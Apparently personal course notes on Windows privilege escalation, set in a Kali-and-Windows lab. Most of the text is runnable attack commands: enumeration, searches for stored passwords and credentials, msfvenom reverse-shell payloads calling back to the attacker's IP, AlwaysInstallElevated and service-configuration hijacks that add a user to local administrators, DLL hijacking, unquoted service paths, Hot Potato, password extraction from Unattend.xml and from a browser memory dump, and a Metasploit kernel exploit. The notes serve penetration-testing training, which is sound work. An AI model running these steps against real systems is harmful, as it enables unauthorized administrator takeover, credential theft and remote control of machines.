Win Priv Esc - TCM Course
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Last updated
1. systeminfo #save all the data in a file and use it with ./
2. systeminfo | findstr /b /c:"OS Name" /c:"OS Versoin" /c:"System Type"
3. wmic qfe
4. wmic qfe Caption,Description,HotFixID,InstalledOn
5. wmic logicaldisk
6. wmic logicaldisk get caption,description,providername
7. wmic logicaldisk get caption
whoami /priv
whoami /groups
net user
net user <user>
net localgroup
net localgroup <group_name>
ipconfig /all # we might see the DC as a DNS server in the list !!!
arp -a
route print
netstat -ano
findstr /si password *.txt *.ini *.config
sc query windefend
sc queryex type= service #enum servies
netsh advfirewall firewall dump
netsh firewall show state
netsh firewall show config
Windows PrivEsc Checklist -
Sherlock -
Watson -
PowerUp -
Windows Exploit Suggester -
Metasploit Local Exploit Suggester -
Seatbelt -
SharpUp -
Meterpreter > run post/multi/recon/local_exploit_suggester
if issues with Pip:
curl -o; python
Windows Kernel Exploits -
port forwarding with plink.exe
Plink Download -
We need to upload first plink.exe on the machine.
plink.exe -l root -pw <root_passwd> -R 445: <atacker_IP>
netstat -ano | grep 445
winexe -U Administrator%<password> // "cmd.exe"
What happens when I type getsystem? -
cmdkey /list # search for stored credentials
mdb-sql <file>.mdb #opens .mdb files (access db files)
readpst #tool to read .pst files (MS office email files)
RUNAS command:
C:\Windows\System32\runas.exe /user:<domain>\<user> /savecred "C:\Windows\System32\cmd.exe /c TYPE C:\Users\Administrator\Desktop\root.txt > C:\Users\<low_priv_user>\file.txt
Registry Escalation - Autorun
Windows VM
1. Open command prompt and type: C:\Users\User\Desktop\Tools\Autoruns\Autoruns64.exe
2. In Autoruns, click on the โLogonโ tab.
3. From the listed results, notice that the โMy Programโ entry is pointing to โC:\Program Files\Autorun Program\program.exeโ.
4. In command prompt type: C:\Users\User\Desktop\Tools\Accesschk\accesschk64.exe -wvu "C:\Program Files\Autorun Program"
5. From the output, notice that the โEveryoneโ user group has โFILE_ALL_ACCESSโ permission on the โprogram.exeโ file.
Kali VM
1. Open command prompt and type: msfconsole
2. In Metasploit (msf > prompt) type: use multi/handler
3. In Metasploit (msf > prompt) type: set payload windows/meterpreter/reverse_tcp
4. In Metasploit (msf > prompt) type: set lhost [Kali VM IP Address]
5. In Metasploit (msf > prompt) type: run
6. Open an additional command prompt and type: msfvenom -p windows/meterpreter/reverse_tcp lhost=[Kali VM IP Address] -f exe -o program.exe
7. Copy the generated file, program.exe, to the Windows VM.
Windows VM
1. Place program.exe in โC:\Program Files\Autorun Programโ.
2. To simulate the privilege escalation effect, logoff and then log back on as an administrator user.
Kali VM
1. Wait for a new session to open in Metasploit.
2. In Metasploit (msf > prompt) type: sessions -i [Session ID]
3. To confirm that the attack succeeded, in Metasploit (msf > prompt) type: getuid
Registry Escalation - AlwaysInstallElevated
Windows VM
1.Open command prompt and type: reg query HKLM\Software\Policies\Microsoft\Windows\Installer
2.From the output, notice that โAlwaysInstallElevatedโ value is 1.
3.In command prompt type: reg query HKCU\Software\Policies\Microsoft\Windows\Installer
4.From the output, notice that โAlwaysInstallElevatedโ value is 1.
Kali VM
1. Open command prompt and type: msfconsole
2. In Metasploit (msf > prompt) type: use multi/handler
3. In Metasploit (msf > prompt) type: set payload windows/meterpreter/reverse_tcp
4. In Metasploit (msf > prompt) type: set lhost [Kali VM IP Address]
5. In Metasploit (msf > prompt) type: run
6. Open an additional command prompt and type: msfvenom -p windows/meterpreter/reverse_tcp lhost=[Kali VM IP Address] -f msi -o setup.msi
7. Copy the generated file, setup.msi, to the Windows VM.
Windows VM
1.Place โsetup.msiโ in โC:\Tempโ.
2.Open command prompt and type: msiexec /quiet /qn /i C:\Temp\setup.msi
Enjoy your shell! :)
Service Escalation - Registry
Windows VM
1. Open powershell prompt and type: Get-Acl -Path hklm:\System\CurrentControlSet\services\regsvc | fl
2. Notice that the output suggests that user belong to โNT AUTHORITY\INTERACTIVEโ has โFullContolโ permission over the registry key.
Windows VM
1. Copy โC:\Users\User\Desktop\Tools\Source\windows_service.cโ to the Kali VM.
Kali VM
1. Open windows_service.c in a text editor and replace the command used by the system() function to: cmd.exe /k net localgroup administrators user /add
2. Exit the text editor and compile the file by typing the following in the command prompt: x86_64-w64-mingw32-gcc windows_service.c -o x.exe (NOTE: if this is not installed, use 'sudo apt install gcc-mingw-w64')
3. Copy the generated file x.exe, to the Windows VM.
Windows VM
1. Place x.exe in โC:\Tempโ.
2. Open command prompt at type: reg add HKLM\SYSTEM\CurrentControlSet\services\regsvc /v ImagePath /t REG_EXPAND_SZ /d c:\temp\x.exe /f
3. In the command prompt type: sc start regsvc
4. It is possible to confirm that the user was added to the local administrators group by typing the following in the command prompt: net localgroup administrators
Service Escalation - Executable Files
Windows VM
1. Open command prompt and type: C:\Users\User\Desktop\Tools\Accesschk\accesschk64.exe -wvu "C:\Program Files\File Permissions Service"
2. Notice that the โEveryoneโ user group has โFILE_ALL_ACCESSโ permission on the filepermservice.exe file.
Windows VM
1. Open command prompt and type: copy /y c:\Temp\x.exe "c:\Program Files\File Permissions Service\filepermservice.exe"
2. In command prompt type: sc start filepermsvc
3. It is possible to confirm that the user was added to the local administrators group by typing the following in the command prompt: net localgroup administrators
Privilege Escalation - Startup Applications
Windows VM
1. Open command prompt and type: icacls.exe "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup"
2. From the output notice that the โBUILTIN\Usersโ group has full access โ(F)โ to the directory.
Kali VM
1. Open command prompt and type: msfconsole
2. In Metasploit (msf > prompt) type: use multi/handler
3. In Metasploit (msf > prompt) type: set payload windows/meterpreter/reverse_tcp
4. In Metasploit (msf > prompt) type: set lhost [Kali VM IP Address]
5. In Metasploit (msf > prompt) type: run
6. Open another command prompt and type: msfvenom -p windows/meterpreter/reverse_tcp LHOST=[Kali VM IP Address] -f exe -o x.exe
7. Copy the generated file, x.exe, to the Windows VM.
Windows VM
1. Place x.exe in โC:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startupโ.
2. Logoff.
3. Login with the administrator account credentials.
Kali VM
1. Wait for a session to be created, it may take a few seconds.
2. In Meterpreter(meterpreter > prompt) type: getuid
3. From the output, notice the user is โUser-PC\Adminโ
icacls Documentation -
Service Escalation - DLL Hijacking
Windows VM
1. Open the Tools folder that is located on the desktop and then go the Process Monitor folder.
2. In reality, executables would be copied from the victimโs host over to the attackerโs host for analysis during run time. Alternatively, the same software can be installed on the attackerโs host for analysis, in case they can obtain it. To simulate this, right click on Procmon.exe and select โRun as administratorโ from the menu.
3. In procmon, select "filter". From the left-most drop down menu, select โProcess Nameโ.
4. In the input box on the same line type: dllhijackservice.exe
5. Make sure the line reads โProcess Name is dllhijackservice.exe then Includeโ and click on the โAddโ button, then โApplyโ and lastly on โOKโ.
6. Next, select from the left-most drop down menu โResultโ.
7. In the input box on the same line type: NAME NOT FOUND
8. Make sure the line reads โResult is NAME NOT FOUND then Includeโ and click on the โAddโ button, then โApplyโ and lastly on โOKโ.
9. Open command prompt and type: sc start dllsvc
10. Scroll to the bottom of the window. One of the highlighted results shows that the service tried to execute โC:\Temp\hijackme.dllโ yet it could not do that as the file was not found. Note that โC:\Tempโ is a writable location.
Windows VM
1. Copy โC:\Users\User\Desktop\Tools\Source\windows_dll.cโ to the Kali VM.
Kali VM
1. Open windows_dll.c in a text editor and replace the command used by the system() function to: cmd.exe /k net localgroup administrators user /add
2. Exit the text editor and compile the file by typing the following in the command prompt: x86_64-w64-mingw32-gcc windows_dll.c -shared -o hijackme.dll
3. Copy the generated file hijackme.dll, to the Windows VM.
Windows VM
1. Place hijackme.dll in โC:\Tempโ.
2. Open command prompt and type: sc stop dllsvc & sc start dllsvc
3. It is possible to confirm that the user was added to the local administrators group by typing the following in the command prompt: net localgroup administrators
Service Escalation - binPath
Windows VM
1. Open command prompt and type: C:\Users\User\Desktop\Tools\Accesschk\accesschk64.exe -wuvc daclsvc
2. Notice that the output suggests that the user โUser-PC\Userโ has the โSERVICE_CHANGE_CONFIGโ permission.
Windows VM
1. In command prompt type: sc config daclsvc binpath= "net localgroup administrators user /add"
2. In command prompt type: sc start daclsvc
3. It is possible to confirm that the user was added to the local administrators group by typing the following in the command prompt: net localgroup administrators
Service Escalation - Unquoted Service Paths
Windows VM
1. Open command prompt and type: sc qc unquotedsvc
2. Notice that the โBINARY_PATH_NAMEโ field displays a path that is not confined between quotes.
Kali VM
1. Open command prompt and type: msfvenom -p windows/exec CMD='net localgroup administrators user /add' -f exe-service -o common.exe
2. Copy the generated file, common.exe, to the Windows VM.
Windows VM
1. Place common.exe in โC:\Program Files\Unquoted Path Serviceโ.
2. Open command prompt and type: sc start unquotedsvc
3. It is possible to confirm that the user was added to the local administrators group by typing the following in the command prompt: net localgroup administrators
For additional practice, it is recommended to attempt the TryHackMe room Steel Mountain (
Potato Escalation - Hot Potato
Windows VM
1. In command prompt type: powershell.exe -nop -ep bypass
2. In Power Shell prompt type: Import-Module C:\Users\User\Desktop\Tools\Tater\Tater.ps1
3. In Power Shell prompt type: Invoke-Tater -Trigger 1 -Command "net localgroup administrators user /add"
4. To confirm that the attack was successful, in Power Shell prompt type: net localgroup administrators
Password Mining Escalation - Configuration Files
Windows VM
1. Open command prompt and type: notepad C:\Windows\Panther\Unattend.xml
2. Scroll down to the โ<Password>โ property and copy the base64 string that is confined between the โ<Value>โ tags underneath it.
Kali VM
1. In a terminal, type: echo [copied base64] | base64 -d
2. Notice the cleartext password
Password Mining Escalation - Memory
Kali VM
1.Open command prompt and type: msfconsole
2.In Metasploit (msf > prompt) type: use auxiliary/server/capture/http_basic
3.In Metasploit (msf > prompt) type: set uripath x
4.In Metasploit (msf > prompt) type: run
Windows VM
1.Open Internet Explorer and browse to: http://[Kali VM IP Address]/x
2.Open command prompt and type: taskmgr
3.In Windows Task Manager, right-click on the โiexplore.exeโ in the โImage Nameโ columnand select โCreate Dump Fileโ from the popup menu.
4.Copy the generated file, iexplore.DMP, to the Kali VM.
Kali VM
1.Place โiexplore.DMPโ on the desktop.
2.Open command prompt and type: strings /root/Desktop/iexplore.DMP | grep "Authorization: Basic"
3.Select and Copy the Base64 encoded string.
4.In command prompt type: echo -ne [Base64 String] | base64 -d
5.Notice the credentials in the output.
Privilege Escalation - Kernel Exploits
Establish a shell
Kali VM
1. Open command prompt and type: msfconsole
2. In Metasploit (msf > prompt) type: use multi/handler
3. In Metasploit (msf > prompt) type: set payload windows/meterpreter/reverse_tcp
4. In Metasploit (msf > prompt) type: set lhost [Kali VM IP Address]
5. In Metasploit (msf > prompt) type: run
6. Open an additional command prompt and type: msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=[Kali VM IP Address] -f exe > shell.exe
7. Copy the generated file, shell.exe, to the Windows VM.
Windows VM
1. Execute shell.exe and obtain reverse shell
Detection & Exploitation
Kali VM
1. In Metasploit (msf > prompt) type: run post/multi/recon/local_exploit_suggester
2. Identify exploit/windows/local/ms16_014_wmi_recv_notif as a potential privilege escalation
3. In Metasploit (msf > prompt) type: use exploit/windows/local/ms16_014_wmi_recv_notif
4. In Metasploit (msf > prompt) type: set SESSION [meterpreter SESSION number]
5. In Metasploit (msf > prompt) type: set LPORT 5555
6. In Metasploit (msf > prompt) type: run
NOTE: The shell might default to your eth0 during this attack. If so, ensure you type set lhost [Kali VM IP Address] and run again.